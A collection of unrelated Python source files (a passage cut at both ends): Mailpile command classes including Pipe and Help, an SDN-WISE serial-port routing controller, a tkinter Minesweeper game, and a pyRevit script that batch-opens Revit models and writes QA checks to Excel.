SYNOPSIS = (None, 'output', None, '[json|text|html|<template>.html|...]')
ORDER = ('Internals', 7)
CONFIG_REQUIRED = False
HTTP_STRICT_VARS = False
HTTP_AUTH_REQUIRED = False
IS_USER_ACTIVITY = False
LOG_NOTHING = True
def etag_data(self):
return self.get_render_mode()
def max_age(self):
return 364 * 24 * 3600 # A long time!
def get_render_mode(self):
return self.args and self.args[0] or self.session.ui.render_mode
def command(self):
m = self.session.ui.render_mode = self.get_render_mode()
return self._success(_('Set output mode to: %s') % m,
result={'output': m})
class Pipe(Command):
"""Pipe a command to a shell command, file or e-mail"""
SYNOPSIS = (None, 'pipe', None,
"[e@mail.com|command|>filename] -- [<cmd> [args ... ]]")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
def command(self):
if '--' in self.args:
dashdash = self.args.index('--')
target = self.args[0:dashdash]
command, args = self.args[dashdash+1], self.args[dashdash+2:]
else:
target, command, args = [self.args[0]], self.args[1], self.args[2:]
output = ''
result = None
old_ui = self.session.ui
try:
from mailpile.ui import CapturingUserInteraction as CUI
self.session.ui = capture = CUI(self.session.config)
capture.render_mode = old_ui.render_mode
result = Action(self.session, command, ' '.join(args))
capture.display_result(result)
output = capture.captured
finally:
self.session.ui = old_ui
if target[0].startswith('>'):
t = ' '.join(target)
if t[0] == '>':
t = t[1:]
with open(t.strip(), 'w') as fd:
fd.write(output.encode('utf-8'))
elif '@' in target[0]:
from mailpile.plugins.compose import Compose
body = 'Result as %s:\n%s' % (capture.render_mode, output)
if capture.render_mode != 'json' and output[0] not in ('{', '['):
body += '\n\nResult as JSON:\n%s' % result.as_json()
composer = Compose(self.session, data={
'to': target,
'subject': ['Mailpile: %s %s' % (command, ' '.join(args))],
'body': [body]
})
return self._success('Mailing output to %s' % ', '.join(target),
result=composer.run())
else:
try:
self.session.ui.block()
MakePopenUnsafe()
kid = subprocess.Popen(target, shell=True, stdin=PIPE)
rv = kid.communicate(input=output.encode('utf-8'))
finally:
self.session.ui.unblock()
MakePopenSafe()
kid.wait()
if kid.returncode != 0:
return self._error('Error piping to %s' % (target, ),
info={'stderr': rv[1], 'stdout': rv[0]})
return self._success('Wrote %d bytes to %s'
% (len(output), ' '.join(target)))
class Quit(Command):
"""Exit Mailpile, normal shutdown"""
SYNOPSIS = ("q", "quit", "quitquitquit", None)
ABOUT = ("Quit mailpile")
ORDER = ("Internals", 2)
CONFIG_REQUIRED = False
RAISES = (KeyboardInterrupt,)
def command(self):
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
mailpile.util.QUITTING = True
self._background_save(index=True, config=True, wait=True)
try:
import signal
os.kill(mailpile.util.MAIN_PID, signal.SIGINT)
except:
def exiter():
time.sleep(1)
os._exit(0)
threading.Thread(target=exiter).start()
return self._success(_('Shutting down...'))
class TrustingQQQ(Command):
"""Allow anybody to quit the app"""
SYNOPSIS = (None, "trustingqqq", None, None)
def command(self):
# FIXME: This is a hack to allow Windows deployments to shut
# down cleanly. Eventually this will take an argument
# specifying a random token that the launcher chooses.
Quit.HTTP_AUTH_REQUIRED = False
return self._success('OK, anybody can quit!')
class Abort(Command):
"""Force exit Mailpile (kills threads)"""
SYNOPSIS = (None, "quit/abort", "abortabortabort", None)
ABOUT = ("Quit mailpile")
ORDER = ("Internals", 2)
CONFIG_REQUIRED = False
HTTP_QUERY_VARS = {
'no_save': 'Do not try to save state'
}
def command(self):
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
mailpile.util.QUITTING = True
if 'no_save' not in self.data:
self._background_save(index=True, config=True, wait=True,
wait_callback=lambda: os._exit(1))
else:
os._exit(1)
return self._success(_('Shutting down...'))
class Help(Command):
"""Print help on Mailpile or individual commands."""
SYNOPSIS = ('h', 'help', 'help', '[<command-group>]')
ABOUT = ('This is Mailpile!')
ORDER = ('Config', 9)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def splash_as_text(self):
text = [
self.result['splash']
]
if self.result['http_url']:
text.append(_('The Web interface address is: %s'
) % self.result['http_url'])
else:
text.append(_('The Web interface is disabled,'
' type `www` to turn it on.'))
text.append('')
b = ' * '
if self.result['interactive']:
text.append(b + _('Type `help` for instructions or `quit` '
'to quit.'))
text.append(b + _('Long running operations can be aborted '
'by pressing: <CTRL-C>'))
if self.result['login_cmd'] and self.result['interactive']:
text.append(b + _('You can log in using the `%s` command.'
) % self.result['login_cmd'])
if self.result['in_browser']:
text.append(b + _('Check your web browser!'))
return '\n'.join(text)
def variables_as_text(self):
text = []
for group in self.result['variables']:
text.append(group['name'])
for var in group['variables']:
sep = ('=' in var['type']) and ': ' or ' = '
text.append((' %-35s %s'
) % (('%s%s<%s>'
) % (var['var'], sep,
var['type'].replace('=', '> = <')),
var['desc']))
text.append('')
return '\n'.join(text)
def commands_as_text(self):
text = [_('Commands:')]
last_rank = None
cmds = self.result['commands']
width = self.result.get('width', 8)
ckeys = cmds.keys()
ckeys.sort(key=lambda k: (cmds[k][3], cmds[k][0]))
arg_width = min(50, max(14, self.session.ui.term.max_width()-70))
for c in ckeys:
cmd, args, explanation, rank = cmds[c]
if not rank or not cmd:
continue
if last_rank and int(rank / 10) != last_rank:
text.append('')
last_rank = int(rank / 10)
if c[0] == '_':
c = ' '
else:
c = '%s|' % c[0]
fmt = ' %%s%%-%d.%ds' % (width, width)
if explanation:
if len(args or '') <= arg_width:
fmt += ' %%-%d.%ds %%s' % (arg_width, arg_width)
else:
pad = len(c) + width + 3 + arg_width
fmt += ' %%s\n%s %%s' % (' ' * pad)
else:
explanation = ''
fmt += ' %s %s '
text.append(fmt % (c, cmd.replace('=', ''),
args and ('%s' % (args, )) or '',
(explanation.splitlines() or [''])[0]))
if self.result.get('tags'):
text.extend([
'',
_('Tags: (use a tag as a command to display tagged '
'messages)'),
'',
self.result['tags'].as_text()
])
return '\n'.join(text)
def as_text(self):
if not self.result:
return _('Error')
return ''.join([
('splash' in self.result) and self.splash_as_text() or '',
(('variables' in self.result) and self.variables_as_text()
or ''),
('commands' in self.result) and self.commands_as_text() or '',
])
def command(self):
config = self.session.config
self.session.ui.reset_marks(quiet=True)
if self.args:
command = self.args[0]
for cls in COMMANDS:
name = cls.SYNOPSIS[1] or cls.SYNOPSIS[2]
width = len(name or '')
if name and name == command:
order = 1
cmd_list = {'_main': (name, cls.SYNOPSIS[3],
cls.__doc__, order)}
subs = [c for c in COMMANDS
if (c.SYNOPSIS[1] or c.SYNOPSIS[2] or ''
).startswith(name + '/')]
for scls in sorted(subs):
sc, scmd, surl, ssynopsis = scls.SYNOPSIS[:4]
order += 1
cmd_list['_%s' % scmd] = (scmd, ssynopsis,
scls.__doc__, order)
width = max(len(scmd or surl), width)
return self._success(_('Displayed help'), result={
'pre': cls.__doc__,
'commands': cmd_list,
'width': width
})
return self._error(_('Unknown command'))
else:
cmd_list = {}
count = 0
for grp in COMMAND_GROUPS:
count += 10
for cls in COMMANDS:
if cls.CONFIG_REQUIRED and not config.loaded_config:
continue
c, name, url, synopsis = cls.SYNOPSIS[:4]
if cls.ORDER[0] == grp and '/' not in (name or ''):
cmd_list[c or '_%s' % name] = (name, synopsis,
cls.__doc__,
count + cls.ORDER[1])
if config.loaded_config:
tags = GetCommand('tags')(self.session).run()
else:
tags = {}
try:
index = self._idx()
except IOError:
index = None
return self._success(_('Displayed help'), result={
'commands': cmd_list,
'tags': tags,
'index': index
})
def _starting(self):
pass
def _finishing(self, rv, *args, **kwargs):
return self.CommandResult(self, self.session, self.name,
self.__doc__, rv,
self.status, self.message)
class HelpVars(Help):
"""Print help on Mailpile variables"""
SYNOPSIS = (None, 'help/variables', 'help/variables', None)
ABOUT = ('The available mailpile variables')
ORDER = ('Config', 9)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
def command(self):
config = self.session.config.rules
result = []
categories = ["sys", "prefs", "profiles"]
for cat in categories:
variables = []
what = config[cat]
if isinstance(what[2], dict):
for ii, i in what[2].iteritems():
variables.append({
'var': ii,
'type': str(i[1]),
'desc': i[0]
})
variables.sort(key=lambda k: k['var'])
result.append({
'category': cat,
'name': config[cat][0],
'variables': variables
})
result.sort(key=lambda k: config[k['category']][0])
return self._success(_('Displayed variables'),
result={'variables': result})
class HelpSplash(Help):
"""Print Mailpile splash screen"""
SYNOPSIS = (None, 'help/splash', 'help/splash', None)
ORDER = ('Config', 9)
CONFIG_REQUIRED = False
def command(self, interactive=True):
from mailpile.auth import Authenticate
http_worker = self.session.config.http_worker
in_browser = False
if http_worker:
http_url = 'http://%s:%s/' % http_worker.httpd.sspec
if ((sys.platform[:3] in ('dar', 'win') or os.getenv('DISPLAY'))
and self.session.config.prefs.open_in_browser):
if BrowseOrLaunch.Browse(http_worker.httpd.sspec):
in_browser = True
time.sleep(2)
else:
http_url = ''
return self._success(_('Displayed welcome message'), result={
'splash': self.ABOUT,
'http_url': http_url,
'in_browser': in_browser,
'login_cmd': (Authenticate.SYNOPSIS[1]
if not self.session.config.loaded_config else ''),
'interactive': interactive
})
def GetCommand(name):
match = [c for c in COMMANDS if name in c.SYNOPSIS[:3]]
if len(match) == 1:
return match[0]
return None
def Action(session, opt, arg, data=None):
session.ui.reset_marks(quiet=True)
config = session.config
if not opt:
return Help(session, 'help').run()
# Use the COMMANDS dict by default.
command = GetCommand(opt)
if command:
return command(session, opt, arg, data=data).run()
# Tags are commands
if config.loaded_config:
tag = config.get_tag(opt)
if tag:
a = 'in:%s%s%s' % (tag.slug, ' ' if arg else '', arg)
return GetCommand('search')(session, opt, arg=a, data=data).run()
# OK, give up!
raise UsageError(_('Unknown command: %s') % opt)
# Commands starting with _ don't get single-letter shortcodes...
COMMANDS = [
Load, Optimize, Rescan, BrowseOrLaunch, RunWWW, ProgramStatus,
GpgCommand, ListDir, ChangeDir, CatFile,
WritePID, ConfigPrint, ConfigSet, ConfigAdd, ConfigUnset, AddMailboxes,
RenderPage, Cached, Output, Pipe,
Help, HelpVars, HelpSplash, Quit, TrustingQQQ, Abort
]
COMMAND_GROUPS = ['Internals', 'Config', 'Searching', 'Tagging', 'Composing']
|
PythonController.py
|
#!/usr/bin/env python
import sys
import time
import serial
import networkx as nx
import threading
from threading import Thread
from datetime import datetime
import networkx as nx
def readUART(Topo):
try:
ser = serial.Serial('/dev/ttyUSB1',115200)
#time.sleep(10)
prev_length = []
length = []
for t in range(10):
prev_length.append(0)
length.append(0)
while 1:
#time.sleep(3)
mtype = ser.readline()
if 'Report' in mtype:
topo = ser.readline()
print 'Topo:'+topo
topoarray = map(int, topo.split(","))
#print datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
#print datetime.now().strftime('%H:%M:%S.%f')[:-3]
print datetime.now().strftime('%H:%M:%S.%f')
print "Topo in Array:"
print topoarray
for s in range(10): #10 nodes assumed
if topoarray[0] == s+1:
length[s] = len(topoarray)
print length[s]
if length[s] != prev_length[s]:#topology changes
if topoarray[0] == 3: #will be 2
resetcommand = str(2)
resetcommand += str(2)
resetcommand += 'r'
resetcommand += 'f'
resetcommand += str(2)
resetcommand += str('\n')
print "Reset Command to send: "+resetcommand
bauni = bytearray(resetcommand)
ser.write(bauni)
print "Reset Command Sent at "
print datetime.now().strftime('%H:%M:%S.%f')
Topo.clear()
prev_length[s] = length[s]
Topo.add_node(topoarray[0])
for num in range(2,len(topoarray)-2,3):
Topo.add_node(topoarray[num])
Topo.add_edge(topoarray[0], topoarray[num],weight=topoarray[num+2])
Topo.add_edge(topoarray[num], topoarray[0],weight=topoarray[num+2])
print Topo.nodes()
print Topo.edges(data=True)
#for (u,v,d) in Topo.edges(data=True):
# print d['weight']
elif 'Request' in mtype:
print datetime.now().strftime('%H:%M:%S.%f')
req = ser.readline()
print 'Request:'+req
reqarray = map(int, req.split(","))
print "Request in Array:"
print reqarray
print 'Shortest Path from %d to %d: ' % (reqarray[0], reqarray[2])
try:
shortpath = nx.dijkstra_path(Topo,reqarray[0],reqarray[2],weight=True)
print shortpath
#if (reqarray[0] == 1 and (len(shortpath) > 2)):
if (len(shortpath) > 2):
nxh = shortpath[1]
for x in range(len(shortpath)-1):
unicastcommand = str(shortpath[0]-1)
unicastcommand += str(shortpath[0]-1)
unicastcommand += 'u'
unicastcommand += str(shortpath[x+1]-1)
unicastcommand += str(nxh-1)
unicastcommand += str('\n')
print "Unicast Command to send: "+unicastcommand
bauni = bytearray(unicastcommand)
ser.write(bauni)
print datetime.now().strftime('%H:%M:%S.%f')
print "Command written to serial port"
time.sleep(2)
else:
unicastcommand = str(shortpath[0]-1)
unicastcommand += str(shortpath[0]-1)
unicastcommand += 'u'
unicastcommand += str(shortpath[1]-1)
unicastcommand += str(shortpath[1]-1)
unicastcommand += str('\n')
print "Unicast Command to send: "+unicastcommand
bauni = bytearray(unicastcommand)
ser.write(bauni)
print datetime.now().strftime('%H:%M:%S.%f')
# for x in range(len(shortpath)-1):
# unicastcommand = str(shortpath[x]-1)
# unicastcommand += str(shortpath[x]-1)
# unicastcommand += 'u'
# unicastcommand += str(shortpath[x+1]-1)
# unicastcommand += str(shortpath[x+1]-1)
# unicastcommand += str('\n')
# print "Unicast Command to send: "+unicastcommand
# bauni = bytearray(unicastcommand)
# ser.write(bauni)
except Exception:
#dropcommand = str(reqarray[0]-1)
#dropcommand += str(reqarray[0]-1)
#dropcommand += 'd'
#dropcommand += str(reqarray[2]-1)
#dropcommand += str(reqarray[2]-1)
#dropcommand += str('\n')
#print "Drop Packet Command to send: "+dropcommand
#babro = bytearray(dropcommand)
#ser.write(babro)
print "Node %d not reachable from %d" % (reqarray[2],reqarray[0])
else:
print mtype
except (KeyboardInterrupt):
sys.exit()
def writeUART(Topo):
try:
ser = serial.Serial('/dev/ttyUSB1',115200)
#time.sleep(10)
#status = raw_input('Please enter your command - write Exit to quit\n')
print 'Please enter your command - write Exit to quit\n'
status = sys.stdin.readline()
while 1:
ba = bytearray(status)
ser.write(ba)
if status == 'Exit':
ser.close()
sys.exit()
break
#status = raw_input('Please enter your command - write Exit to quit\n')
print 'Please enter your command - write Exit to quit\n'
status = sys.stdin.readline()
except (KeyboardInterrupt):
sys.exit()
if __name__=='__main__':
print datetime.now().strftime('%H:%M:%S.%f')
print("Simple Python Controller for SDN-WISE Starting .....")
Topo = nx.DiGraph()
threadwrite = threading.Thread(target = writeUART, args = [Topo])
threadwrite.Daemon = True
threadwrite.start()
threadread = threading.Thread(target = readUART, args = [Topo])
threadread.Daemon = True
threadread.start()
|
main.py
|
from tkinter import *
from tkinter import messagebox
import time
import threading
import random
time_limit = 0
stop_event = False
free_cells = 0
total_free_cells = 0
first_move = True
class Entry_number(Entry):
"""
A class that was used in the Main Menu in order to make Entry Boxes
that don't accept invalid inputs (other characters other than digits).
"""
def __init__(self, master=None, **kwargs):
self.var = StringVar()
Entry.__init__(self, master, textvariable=self.var, **kwargs)
self.old_value = ''
self.var.trace('w', self.check)
self.get, self.set = self.var.get, self.var.set
def check(self, *args):
if self.get().isdigit() or self.get() == "":
self.old_value = self.get()
else:
self.set(self.old_value)
"""
The main scope was used to initialize all the widgets and to place them
inside frames to be easier to access later on.
The widgets are aligned in a grid. The tkinter class Frame was used in
order to align multiple elements. When the screen is resized, the widgets
will change their position accordingly.
"""
root = Tk()
root.geometry("600x600")
root.title("Minesweeper")
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
image_face_happy = PhotoImage(file="./textures/face_happy.png")
image_face_happy = image_face_happy.zoom(20)
image_face_happy = image_face_happy.subsample(32)
image_face_dead = PhotoImage(file="./textures/face_dead.png")
image_face_dead = image_face_dead.zoom(10)
image_face_dead = image_face_dead.subsample(32)
image_unpressed = PhotoImage(file="./textures/unpressed.png")
image_pressed = PhotoImage(file="./textures/pressed.png")
image_numbers = [
PhotoImage(file="./textures/1.png"),
PhotoImage(file="./textures/2.png"),
PhotoImage(file="./textures/3.png"),
PhotoImage(file="./textures/4.png"),
PhotoImage(file="./textures/5.png"),
PhotoImage(file="./textures/6.png"),
PhotoImage(file="./textures/7.png"),
PhotoImage(file="./textures/8.png"),
]
image_flag = PhotoImage(file="./textures/flag.png")
image_bombpressed = PhotoImage(file="./textures/bombpressed.png")
image_bombred = PhotoImage(file="./textures/bombred.png")
image_bombx = PhotoImage(file="./textures/bombx.png")
image_win_button = PhotoImage(file="./textures/win_button.png")
image_lose_button = PhotoImage(file="./textures/lose_button.png")
main_menu_frame = Frame(root)
main_menu_frame.grid(row=0, column=0, sticky='news')
main_menu_frame.columnconfigure(0, weight=1)
main_menu_frame.rowconfigure(0, weight=1)
main_menu_frame.rowconfigure(1, weight=1)
game_name_frame = Frame(main_menu_frame)
game_name_frame.grid(row=0, column=0, sticky='news')
game_name_frame.columnconfigure(0, weight=1)
game_name_label = Label(game_name_frame, text="Minesweeper")
game_name_label.grid(row=0, padx=20, pady=10, column=0)
game_name_label.config(font=("Courier", 30))
menu_image = Label(game_name_frame, image=image_face_happy)
menu_image.grid(row=1, column=0)
game_options_frame = Frame(main_menu_frame)
game_options_frame.grid(row=1, column=0, sticky='n')
group_options1_frame = Frame(game_options_frame)
group_options1_frame.grid(row=0, column=0)
group_options2_frame = Frame(game_options_frame)
group_options2_frame.grid(row=0, column=1)
table_size_label = Label(group_options1_frame, text="Table size:")
table_size_label.grid(row=0, column=0, padx=10, pady=10, sticky="w")
table_size_label.config(font=("Arial", 15))
table_size_entry_height = Entry_number(group_options2_frame,
font="Arial 15", width="3")
table_size_entry_height.grid(row=0, column=0, padx=10, pady=10)
table_size_x_label = Label(group_options2_frame, text="X")
table_size_x_label.grid(row=0, column=1, pady=10)
table_size_x_label.config(font=("Arial", 15))
table_size_entry_width = Entry_number(group_options2_frame,
font="Arial 15", width="3")
table_size_entry_width.grid(row=0, column=2, padx=10, pady=10)
time_limit_label = Label(group_options1_frame, text="Time Limit:")
time_limit_label.grid(row=1, column=0, padx=10, pady=10, sticky="w")
time_limit_label.config(font=("Arial", 15))
time_limit_entry = Entry_number(group_options2_frame,
font="Arial 15", width="3")
time_limit_entry.grid(row=1, column=0, padx=10, pady=10)
nr_bombs_label = Label(group_options1_frame, text="Bombs:")
nr_bombs_label.grid(row=2, column=0, padx=10, pady=10, sticky="w")
nr_bombs_label.config(font=("Arial", 15))
nr_bombs_entry = Entry_number(group_options2_frame,
font="Arial 15", width="3")
nr_bombs_entry.grid(row=2, column=0, padx=10, pady=10)
start_game_frame = Frame(game_options_frame)
start_game_frame.grid(row=1, column=0, columnspan=2, sticky="we")
start_game_frame.columnconfigure(0, weight=1)
start_game_frame.rowconfigure(0, weight=1)
def mainMenu(itself):
"""
A function that gets called in order to return to the main
menu.
The Main Menu Frame is kept in memory and readded once the
user clicks the Main Menu Button.
"""
itself.grid_forget()
root.geometry("600x600")
main_menu_frame.grid(row=0, column=0, sticky='news')
def startGame():
"""
The function that is called when the user click the Start Game button.
When the user starts a game, firstly the program will check if the given
inputs are valid. Otherwise an error message will be shown using the
"messagebox" class from tkinter.
If all the inputs are valid, the game will generate a matrix where it will
place the bombs. First all the grid positions will be added to a list then
the program iterate over that list, picking a random position then removing
that coordinates from the list. This method was used in order to eliminate
the posibility that two bombs can be placed in the same position.
Then the program will create a grid of buttons representing the cells, then
add left click and right click events, aswell as images, to it.
"""
if table_size_entry_height.get() == ""\
and table_size_entry_width.get() != "":
messagebox.showerror("Error", "Height has to be filled")
elif table_size_entry_height.get() != ""\
and table_size_entry_width.get() == "":
messagebox.showerror("Error", "Width has to be filled")
elif table_size_entry_height.get() != ""\
and int(table_size_entry_height.get()) == 0:
messagebox.showerror("Error", "Height has to be positive")
elif table_size_entry_width.get() != ""\
and int(table_size_entry_width.get()) == 0:
messagebox.showerror("Error", "Width has to be positive")
elif table_size_entry_height.get() == ""\
and table_size_entry_width.get() == ""\
and nr_bombs_entry.get() != ""\
and int(nr_bombs_entry.get()) > 10 * 10 - 1:
messagebox.showerror("Error", "Nr of bombs exceeds table size")
elif table_size_entry_height.get() != ""\
and table_size_entry_width.get() != ""\
and nr_bombs_entry.get() != ""\
and int(nr_bombs_entry.get()) >\
int(table_size_entry_height.get()) *\
int(table_size_entry_width.get()) - 1:
messagebox.showerror("Error", "Nr of bombs exceeds table size")
elif table_size_entry_height.get() != ""\
and table_size_entry_width.get() != ""\
and nr_bombs_entry.get() == ""\
and 10 > int(table_size_entry_height.get()) *\
int(table_size_entry_width.get()) - 1:
messagebox.showerror("Error", "Nr of bombs exceeds table size")
else:
main_menu_frame.grid_forget()
nr_bombs = 10
table_height = 10
table_width = 10
global time_limit
global stop_event
global free_cells
global total_free_cells
global first_move
first_move = True
stop_event = False
time_limit = 60
if table_size_entry_height.get() != ""\
and table_size_entry_width.get() != "":
table_height = int(table_size_entry_height.get())
table_width = int(table_size_entry_width.get())
if nr_bombs_entry.get() != "":
nr_bombs = int(nr_bombs_entry.get())
if time_limit_entry.get() != "":
time_limit = int(time_limit_entry.get())
total_free_cells = (table_height * table_width) - nr_bombs
free_cells = 0
available_positions = []
for i in range(table_height):
for j in range(table_width):
available_positions.append([i, j])
bomb_matrix = [[0 for i in range(table_width)]
for y in range(table_height)]
flag_matrix = [[0 for i in range(table_width)]
for y in range(table_height)]
for i in range(nr_bombs):
r = random.randint(0, len(available_positions) - 1)
bomb_matrix[
available_positions[r][0]
][available_positions[r][1]] = 1
del available_positions[r]
root.geometry("")
main_game_frame = Frame(root)
main_game_frame.grid(row=0, column=0, sticky='news')
main_game_frame.rowconfigure(0, weight=1)
main_game_frame.rowconfigure(1, weight=1)
main_game_frame.columnconfigure(0, weight=1)
top_frame = Frame(main_game_frame)
top_frame.grid(row=0, column=0, sticky='n')
time_limit_label = Label(top_frame, font="Arial 20",
text='Time: {:02}:{:02}'.format(
time_limit % 3600//60, time_limit % 60
))
time_limit_label.grid(row=0, column=0, pady=10)
game_frame = Frame(main_game_frame)
game_frame.grid(row=1, column=0, padx=20, pady=20, sticky='n')
button_matrix = [[0 for i in range(table_width)]
for y in range(table_height)]
def finalTable(x, y, reason):
"""
The function that displays the final board after the game has
ended.
When the game has ended the program will display the final board.
It verifies the buttons grid against the bomb matrix and the flag
matrix in order to correcly place the images. An additional
button will be placed instead of the countdown timer to allow the
user to return to the Main Menu.
"""
global stop_event
stop_event = True
time_limit_label.grid_forget()
reset_button = Button(top_frame)
reset_button.grid(row=0, column=0, pady=14)
reset_button['command'] = \
lambda itself = main_game_frame: mainMenu(itself)
if reason == 'lost' or reason == 'time':
reset_button['image'] = image_lose_button
elif reason == 'won':
reset_button['image'] = image_win_button
for i in range(table_height):
for j in range(table_width):
button_matrix[i][j]['relief'] = 'sunken'
button_matrix[i][j]['command'] = 0
if bomb_matrix[i][j] == 1 and flag_matrix[i][j] == 1:
button_matrix[i][j]['image'] = image_bombx
elif bomb_matrix[i][j] == 1 and flag_matrix[i][j] == 0:
button_matrix[i][j]['image'] = image_bombpressed
if bomb_matrix[x][y] == 1 and reason != 'time':
button_matrix[x][y]['image'] = image_bombred
def countdown():
"""
The function for the daemon thread.
In order to display the time, a daemon thread is launched that
sleeps every one second and afterwards updates a global variable
and the timer label.
"""
global time_limit
global stop_event
while time_limit > 0 and not stop_event:
time.sleep(1)
time_limit -= 1
time_limit_label['text'] = 'Time: {:02}:{:02}'.format(
time_limit % 3600//60, time_limit % 60)
if not stop_event:
finalTable(0, 0, 'time')
countdown_thread = threading.Thread(target=countdown)
countdown_thread.daemon = True
countdown_thread.start()
def walk(x, y):
"""
The function that walks the board recursively to reveal
positions.
To walk the board, first the program checks if the cell
the player has clicked on contains a bomb. If it does
indeed contain a bomb, then the final board will be shown
and the game will end. An extra check will be performed
to move the bomb in another cell if its the player's first
move. If the cell does not contain a bomb then the program
will verify the number of neighbouring bombs. If the number
of bombs is higher than 0, then the recursive function will
stop and only update the current position with the number of
bombs. If it is 0, then the recursive function will be
called for every neighbour
"""
global free_cells
global first_move
if bomb_matrix[x][y] == 1:
if first_move:
bomb_matrix[x][y] = 0
r = random.randint(0, len(available_positions) - 1)
bomb_matrix[
available_positions[r][0]
][available_positions[r][1]] = 1
walk(x, y)
else:
finalTable(x, y, 'lost')
elif button_matrix[x][y]['relief'] != 'sunken'\
and flag_matrix[x][y] == 0:
free_cells += 1
direct_x = [-1, -1, -1, 0, 0, 1, 1, 1]
direct_y = [0, -1, 1, -1, 1, -1, 0, 1]
nr_bombs = 0
for i in range(len(direct_x)):
if x + direct_x[i] < table_height\
and x + direct_x[i] >= 0\
and y + direct_y[i] < table_width\
and y + direct_y[i] >= 0:
if bomb_matrix[x + direct_x[i]][y + direct_y[i]] == 1:
nr_bombs += 1
if nr_bombs == 0:
button_matrix[x][y]['command'] = 0
button_matrix[x][y]['relief'] = 'sunken'
button_matrix[x][y]['image'] = image_pressed
for i in range(len(direct_x)):
if x + direct_x[i] < table_height\
and x + direct_x[i] >= 0\
and y + direct_y[i] < table_width\
and y + direct_y[i] >= 0:
walk(x + direct_x[i], y + direct_y[i])
else:
button_matrix[x][y]['command'] = 0
button_matrix[x][y]['relief'] = 'sunken'
button_matrix[x][y]['image'] = image_numbers[nr_bombs - 1]
def click(button):
"""
The function that gets called when the user left clicks on a
button.
When the left clicks a button, it will trigger the left click
event that will call a function to recursively walk the board
in order to expand cells. After every walk the program checks
the number of discovered cells in order to see if the user has
won.
"""
global free_cells
global total_free_cells
global first_move
x = button.grid_info()['row']
y = button.grid_info()['column']
walk(x, y)
first_move = False
if free_cells == total_free_cells and total_free_cells != 0:
finalTable(x, y, 'won')
def right_click(event):
"""
The function that gets called when the user right clicks on
a button.
When the user right clicks a button, that cell will be marked
with a flag. If a flag is already present, it will be removed.
Flags stop the propagation of the walk function on that
respective cell.
"""
x = event.widget.grid_info()['row']
y = event.widget.grid_info()['column']
if button_matrix[x][y]['relief'] != 'sunken':
if flag_matrix[x][y] == 1:
flag_matrix[x][y] = 0
button_matrix[x][y]['image'] = image_unpressed
button_matrix[x][y]['command'] = \
lambda button = button_matrix[x][y]: click(button)
else:
flag_matrix[x][y] = 1
button_matrix[x][y]['image'] = image_flag
button_matrix[x][y]['command'] = 0
for i in range(table_height):
for j in range(table_width):
button_matrix[i][j] = Button(game_frame,
image=image_unpressed)
button_matrix[i][j]['command'] =\
lambda button = button_matrix[i][j]: click(button)
button_matrix[i][j].bind("<Button-2>", right_click)
button_matrix[i][j].bind("<Button-3>", right_click)
button_matrix[i][j].grid(row=i, column=j)
start_game_button = Button(start_game_frame, text="Start",
font="Arial 15", command=startGame)
start_game_button.grid(row=2, column=0, padx=10, pady=10, sticky="we")
root.mainloop()
|
script.py
|
import sys
import ConfigParser
from os.path import expanduser
# Set system path
home = expanduser("~")
cfgfile = open(home + "\\STVTools.ini", 'r')
config = ConfigParser.ConfigParser()
config.read(home + "\\STVTools.ini")
# Master Path
syspath1 = config.get('SysDir','MasterPackage')
sys.path.append(syspath1)
# Built Path
syspath2 = config.get('SysDir','SecondaryPackage')
sys.path.append(syspath2)
from pyrevit.framework import List
from pyrevit import revit, DB, forms
import re, clr, os, threading
import EwrQcUtils
import xlsxwriter
clr.AddReference('RevitAPI')
clr.AddReference("System")
from Autodesk.Revit.DB import FilteredElementCollector, Transaction, ImportInstance, \
OpenOptions,WorksetConfiguration, WorksetConfigurationOption, DetachFromCentralOption,\
ModelPathUtils, SaveAsOptions, WorksharingSaveAsOptions
from System.Collections.Generic import List
from Autodesk.Revit.UI.Events import DialogBoxShowingEventArgs
from Autodesk.Revit.UI import UIApplication
from Autodesk.Revit.ApplicationServices import Application
clr.AddReferenceByPartialName('PresentationCore')
clr.AddReferenceByPartialName('PresentationFramework')
clr.AddReferenceByPartialName('System.Windows.Forms')
clr.AddReference('RevitAPIUI')
# Collect Save location and Rvt Files
collectorFiles = forms.pick_file(file_ext='rvt', multi_file=True, unc_paths=False)
destinationFolder = forms.pick_folder()
def RVTFileCollector(dir):
files = []
for file in os.listdir(dir):
if file.endswith(".rvt"):
#print(str(file))
files.append(str(file))
print files
return files
def OpenFiles(oFile, app, audit):
openOpt = OpenOptions()
if audit == True:
openOpt.Audit = True
else:
openOpt.Audit = False
openOpt.DetachFromCentralOption = DetachFromCentralOption.DetachAndPreserveWorksets
wsopt = WorksetConfiguration(WorksetConfigurationOption.CloseAllWorksets)
# wsopt.Open(worksetList)
openOpt.SetOpenWorksetsConfiguration(wsopt)
modelPath = ModelPathUtils.ConvertUserVisiblePathToModelPath(oFile)
currentdoc = app.OpenDocumentFile(modelPath, openOpt)
try:
DialogBoxShowingEventArgs.OverrideResult(1)
except:
pass
return currentdoc
# Main
uidoc = __revit__.ActiveUIDocument
doc = __revit__.ActiveUIDocument.Document
__doc__ = 'Open projects and resave in a specific location'\
'Please do not use lightly'
uiapp = UIApplication(doc.Application)
application = uiapp.Application
def ElementsProcessing(openedDoc, name):
collectorFamily = EwrQcUtils.ElementinWorksetCheck(openedDoc)
EwrQcUtils.ExcelWriter(excelFile, name, 1, 0, collectorFamily)
# Transaction
if len(collectorFiles) > 0:
t = Transaction(doc, 'Check QAQC Elements')
t.Start()
fileName = destinationFolder + '\\' + 'LOD Check File' + '.xlsx'
excelFile = EwrQcUtils.ExcelOpener(fileName)
for aDoc in collectorFiles:
openedDoc = OpenFiles(aDoc, application, audit = False)
print(str(openedDoc.Title) + ' Opened')
workshareOp = WorksharingSaveAsOptions()
# Define the name and location of excel file
rawTitle = re.split('detached', openedDoc.Title)[0]
title = rawTitle[0:len(rawTitle) -1]
# Define and Open Excel File
threading.Thread(name=title, target=ElementsProcessing(openedDoc, title))
# Close Excel and Revit File
openedDoc.Close(False)
excelFile.close()
print('File Saved' )
t.Commit()
else:
